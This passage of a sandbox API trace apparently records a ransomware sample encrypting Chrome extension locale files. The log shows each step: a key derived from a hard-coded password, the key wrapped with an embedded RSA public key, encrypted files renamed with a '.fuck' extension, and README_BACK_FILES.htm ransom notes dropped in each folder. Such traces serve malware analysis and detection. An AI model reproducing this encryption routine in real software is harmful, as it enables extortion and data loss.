data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json"), bFailIfExists=0) returned 1 [0249.539] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json", dwFileAttributes=0x0) returned 1 [0249.539] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json.gsg")) returned 1 [0249.541] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json.fuck")) returned 1 [0249.542] CryptDestroyHash (hHash=0x2938978) returned 1 [0249.542] CryptDestroyKey (hKey=0x2937738) returned 1 [0249.542] CryptReleaseContext (hProv=0x293d3d0, dwFlags=0x0) returned 1 [0249.542] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0249.542] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0249.542] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\readme_back_files.htm")) returned 0xffffffff [0249.543] AreFileApisANSI () returned 1 [0249.543] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3700, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0249.543] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0249.543] GetFileType (hFile=0x5d54) returned 0x1 [0249.544] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0249.545] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0249.545] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0249.546] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.546] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.546] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0249.546] GetLastError () returned 0x0 [0249.546] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json")) returned 0x20 [0249.546] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json", dwFileAttributes=0x80) returned 1 [0249.547] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0249.547] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0249.549] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0249.549] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x293d3d0) returned 1 [0249.551] CryptCreateHash (in: hProv=0x293d3d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0249.551] lstrlenA (lpString="jXUsvFjvtnzONPctpfadKqUJzMlQm") returned 29 [0249.551] CryptHashData (hHash=0x2938978, pbData=0x28cb710, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0249.551] CryptDeriveKey (in: hProv=0x293d3d0, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2937738) returned 1 [0249.551] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0249.552] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0249.552] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293f2a0) returned 1 [0249.552] CryptImportPublicKeyInfo (in: hCryptProv=0x293f2a0, dwCertEncodingType=0x1, pInfo=0x2932fb0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2932fe0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2932fe8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2937cb8) returned 1 [0249.552] CryptEncrypt (in: hKey=0x2937cb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0249.552] CryptEncrypt (in: hKey=0x2937cb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293f190*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293f190*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0249.552] WriteFile (in: hFile=0x5d58, lpBuffer=0x293f190*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293f190*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0249.554] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xd6, lpOverlapped=0x0) returned 1 [0249.555] CryptEncrypt (in: hKey=0x2937738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xd6, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0249.555] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0249.555] CloseHandle (hObject=0x5d5c) returned 1 [0249.555] CloseHandle (hObject=0x5d58) returned 1 [0249.555] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json"), bFailIfExists=0) returned 1 [0249.558] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json", dwFileAttributes=0x0) returned 1 [0249.559] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json.gsg")) returned 1 [0249.560] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\messages.json.fuck")) returned 1 [0249.563] CryptDestroyHash (hHash=0x2938978) returned 1 [0249.563] CryptDestroyKey (hKey=0x2937738) returned 1 [0249.563] CryptReleaseContext (hProv=0x293d3d0, dwFlags=0x0) returned 1 [0249.563] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0249.563] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0249.563] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\readme_back_files.htm")) returned 0xffffffff [0249.563] AreFileApisANSI () returned 1 [0249.563] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3700, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0249.564] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0249.564] GetFileType (hFile=0x5d54) returned 0x1 [0249.564] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0249.565] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0249.565] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0249.566] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.566] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.566] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0249.566] GetLastError () returned 0x0 [0249.566] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json")) returned 0x20 [0249.566] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json", dwFileAttributes=0x80) returned 1 [0249.567] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0249.567] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0249.568] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0249.568] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x293d3d0) returned 1 [0249.571] CryptCreateHash (in: hProv=0x293d3d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0249.571] lstrlenA (lpString="jXUsvFjvtnzONPctpfadKqUJzMlQm") returned 29 [0249.571] CryptHashData (hHash=0x2938978, pbData=0x28cb5a8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0249.571] CryptDeriveKey (in: hProv=0x293d3d0, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2937738) returned 1 [0249.571] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0249.571] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0249.571] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2940070) returned 1 [0249.571] CryptImportPublicKeyInfo (in: hCryptProv=0x2940070, dwCertEncodingType=0x1, pInfo=0x2932ad0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2932b00*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2932b08*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2937c38) returned 1 [0249.571] CryptEncrypt (in: hKey=0x2937c38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0249.572] CryptEncrypt (in: hKey=0x2937c38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293f878*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293f878*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0249.572] WriteFile (in: hFile=0x5d5c, lpBuffer=0x293f878*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293f878*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0249.573] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xfe, lpOverlapped=0x0) returned 1 [0249.574] CryptEncrypt (in: hKey=0x2937738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xfe, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x100) returned 1 [0249.574] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x100, lpOverlapped=0x0) returned 1 [0249.574] CloseHandle (hObject=0x5d58) returned 1 [0249.574] CloseHandle (hObject=0x5d5c) returned 1 [0249.575] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json"), bFailIfExists=0) returned 1 [0249.578] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json", dwFileAttributes=0x0) returned 1 [0249.578] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json.gsg")) returned 1 [0249.580] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json.fuck")) returned 1 [0249.580] CryptDestroyHash (hHash=0x2938978) returned 1 [0249.581] CryptDestroyKey (hKey=0x2937738) returned 1 [0249.581] CryptReleaseContext (hProv=0x293d3d0, dwFlags=0x0) returned 1 [0249.581] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0249.581] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0249.581] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\readme_back_files.htm")) returned 0xffffffff [0249.581] AreFileApisANSI () returned 1 [0249.581] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0249.581] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0249.581] GetFileType (hFile=0x5d54) returned 0x1 [0249.582] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0249.583] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0249.583] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0249.584] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.584] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.584] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0249.584] GetLastError () returned 0x0 [0249.584] GetFileAttributesA 